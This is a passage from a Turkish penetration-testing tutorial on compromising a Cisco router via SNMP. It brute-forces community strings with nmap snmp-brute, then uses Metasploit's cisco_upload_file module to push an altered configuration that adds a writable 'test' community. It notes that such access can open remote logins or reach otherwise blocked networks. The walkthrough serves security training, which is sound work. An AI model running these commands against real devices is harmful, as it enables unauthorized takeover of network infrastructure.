Not: Günümüzde sadece 2. katmanda çalışan ve Switch görevi gören cihazlara pek fazla rastlanmamaktadır. Bu sebeple, yazının devamında geçen Router olarak ifadeler Switch için de geçerlidir.
Mevcut durumda Nmap snmp-brute betiğine argüman olarak bir sözlük dosyası verildiğinde, sözlükteki “public” topluluk isminin Router için kullanıldığı görülmektedir.
cat /root/Desktop/ToplulukIsımleri.txt
nmap 192.168.0.200 -sU -p161 –open -Pn -n –script=snmp-brute –script-args snmp-brute.communitiesdb=/root/Desktop/ToplulukIsımleri.txt
Bu Router’a ait olan konfigürasyon dosyasının aşağıdaki gibi olduğunu varsayalım.
Konfigürasyon bilgisi elde edildikten sonra Router üzerinde herhangi bir değişiklik yapılabilir. Böylece Router için bir yeni bir kullanıcı oluşturulabilir, bir bağlantı (SSH, Telnet, HTTP gibi) açılabilir veya kurallarda değişiklik yapılarak normalde erişim sağlanamayan bir ağa erişim sağlanabilir. Bu yazı için örnek olarak yazma ve okuma izni olan yeni bir topluluk ismi eklenecektir.
Elde edilen bu konfigürasyon dosyasına “test” adlı ve yazma izni olan bir topluluk ismi eklenecek ve yeni konfigürasyon dosyası Router’un konfigürasyon dosyası olarak kaydedilecektir.
Kaydedilen konfigürasyon dosyasının kaydedilmesi için MSF cisco_upload_file auxiliary modülü seçilir ve seçenekleri listelenir.
search cisco_upload_file
use auxiliary/scanner/snmp/cisco_upload_file
show options
Modül seçenekleri ayarlanır.
set RHOSTS 192.168.0.200
set COMMUNITY private
set SOURCE /root/Desktop/192.168.0.200.txt
set VERSION 2c
show options
Modül çalıştırılarak transfer işlemi gerçekleştirilir.
run
Transfer işleminden sonra, Nmap snmp-brute betiğine argüman olarak aynı sözlük dosyası verildiğinde, sözlükteki “public” topluluk isminin yanı sıra, “test” topluluk isminin de Router için kullanıldığı görülmektedir.
cat /root/Desktop/ToplulukIsımleri.txt
nmap 192.168.0.200 -sU -p161 –open -Pn -n –script=snmp-brute –script-args snmp-brute.communitiesdb=/root/Desktop/ToplulukIsımleri.txt